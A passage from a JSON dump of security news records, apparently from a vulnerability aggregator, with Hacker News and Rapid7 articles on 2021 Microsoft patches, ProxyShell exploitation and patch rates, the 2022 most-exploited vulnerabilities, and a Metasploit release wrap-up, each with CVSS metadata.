Vulnerability (publicly disclosed as \"[PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)\")\n * **CVE-2021-31979** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-33771** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-34448** (CVSS score: 6.8) - Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft also stressed the high attack complexity of CVE-2021-34448, specifically stating that the attacks hinge on the possibility of luring an unsuspecting user into clicking on a link that leads to a malicious website hosted by the adversary and contains a specially-crafted file that's engineered to trigger the vulnerability.\n\nThe other five publicly disclosed, but not exploited, zero-day vulnerabilities are listed below \u2014\n\n * **CVE-2021-34473** (CVSS score: 9.1) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * **CVE-2021-34523** (CVSS score: 9.0) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * **CVE-2021-33781** (CVSS score: 8.1) - Active Directory Security Feature Bypass Vulnerability\n * **CVE-2021-33779** (CVSS score: 8.1) - Windows ADFS Security Feature Bypass Vulnerability\n * **CVE-2021-34492** (CVSS score: 8.1) - Windows Certificate Spoofing Vulnerability\n\n\"This Patch Tuesday comes just days after out-of-band updates were released to address PrintNightmare \u2014 the critical flaw in the Windows Print Spooler service that was found in all versions of Windows,\" Bharat Jogi, senior manager of vulnerability and threat research at Qualys, told The Hacker News.\n\n\"While MSFT has released updates to fix the vulnerability, users must still ensure that necessary configurations are set up correctly. Systems with misconfigurations will continue to be at risk of exploitation, even after the latest patch has been applied. PrintNightmare was a highly serious issue that further underscores the importance of marrying detection and remediation,\" Jogi added.\n\nThe PrintNightmare vulnerability has also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [release an emergency directive](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler>), urging federal departments and agencies to apply the latest security updates immediately and disable the print spooler service on servers on Microsoft Active Directory Domain Controllers.\n\nAdditionally, Microsoft also rectified a security bypass vulnerability in Windows Hello biometrics-based authentication solution ([CVE-2021-34466](<https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery>), CVSS score: 5.7) that could permit an adversary to spoof a target's face and get around the login screen.\n\nOther critical flaws remediated by Microsoft include remote code execution vulnerabilities affecting Windows DNS Server (CVE-2021-34494, CVSS score 8.8) and Windows Kernel (CVE-2021-34458), the latter of which is rated 9.9 on the CVSS severity scale.\n\n\"This issue allows a single root input/output virtualization (SR-IOV) device which is assigned to a guest to potentially interfere with its Peripheral Component Interface Express (PCIe) siblings which are attached to other guests or to the root,\" Microsoft noted in its advisory for CVE-2021-34458, adding Windows instances hosting virtual machines are vulnerable to this flaw.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-07-01>)\n * [Apache Tomcat](<https://mail-archives.us.apache.org/mod_mbox/www-announce/202107.mbox/%3Cd050b202-b64e-bc6f-a630-2dd83202f23a%40apache.org%3E>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/article/CTX319750>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-July/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T05:03:00", "type": "thn", "title": "Update Your Windows PCs to Patch 117 New Flaws, Including 9 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34466", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34494", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-17T11:52:45", "id": "THN:9FD8A70F9C17C3AF089A104965E48C95", "href": "https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-04T08:27:53", "description": "[![Most Exploited Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoBeYlJXEHlGr6rAJniL2XD4Ma4efotehIvHqoBelnDjYCGmj8xiT_Ywd1KZ4ib2iPE9jPLa0Pm_4yinuBV4dFS1DU6tYFmtWc8MCdQ0JAX1qTBXY6Airy55EM3rJtfcw5XqbClVD4K7dX5ocGZfUZHAalQRMYv6Ujka3fZWMc6HDW2AIMvXuZB6SsXGos/s728-e365/flaws.jpg>)\n\nA four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022.\n\n\"In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems,\" cybersecurity and intelligence agencies from the Five Eyes nations, which comprises Australia, Canada, New Zealand, the U.K., and the U.S., [said](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>) in a joint alert.\n\nThe continued weaponization of [CVE-2018-13379](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>), which was also one among the most exploited bugs in [2020](<https://thehackernews.com/2021/07/top-30-critical-security.html>) and [2021](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>), suggests a failure on the part of organizations to apply patches in a timely manner, the authorities said.\n\n\"Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs,\" according to the advisory. \"While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/edWGl41h> \"Cybersecurity\" )\n\n[CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) refers to a path traversal defect in the FortiOS SSL VPN web portal that could allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.\n\nSome of other widely exploited flaws include:\n\n * [CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) (ProxyShell)\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (Unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus)\n * [CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)\n * [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (Log4Shell)\n * [CVE-2022-22954](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Remote code execution in VMware Workspace ONE Access and Identity Manager)\n * [CVE-2022-22960](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation)\n * [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (Unauthenticated remote code execution in F5 BIG-IP)\n * [CVE-2022-30190](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (Follina)\n * [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)\n\n\"Attackers generally see the most success exploiting known vulnerabilities within the first two years of public disclosure and likely target their exploits to maximize impact, emphasizing the benefit of organizations applying security updates promptly,\" the U.K.'s National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/ncsc-allies-reveal-2022-common-exploited-vulnerabilities>).\n\n\"Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations),\" the agencies noted.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-04T07:02:00", "type": "thn", "title": "Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-04T07:02:32", "id": "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "href": "https://thehackernews.com/2023/08/major-cybersecurity-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-10-06T15:02:24", "description": "![For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy](https://blog.rapid7.com/content/images/2021/10/exchange-server.jpg)\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n![For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy](https://blog.rapid7.com/content/images/2021/10/proxyshell_summary_2021.10.01.png)\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n![For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy](https://blog.rapid7.com/content/images/2021/10/proxyshell_detailed_2021.10.01.png)\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n![For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy](https://blog.rapid7.com/content/images/2021/10/proxyshell_os_2021.10.01.png)\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/08/metasploit-blg-2-small.png)\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>),, [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "![ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](https://blog.rapid7.com/content/images/2021/08/proxyshell-august.jpg)\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 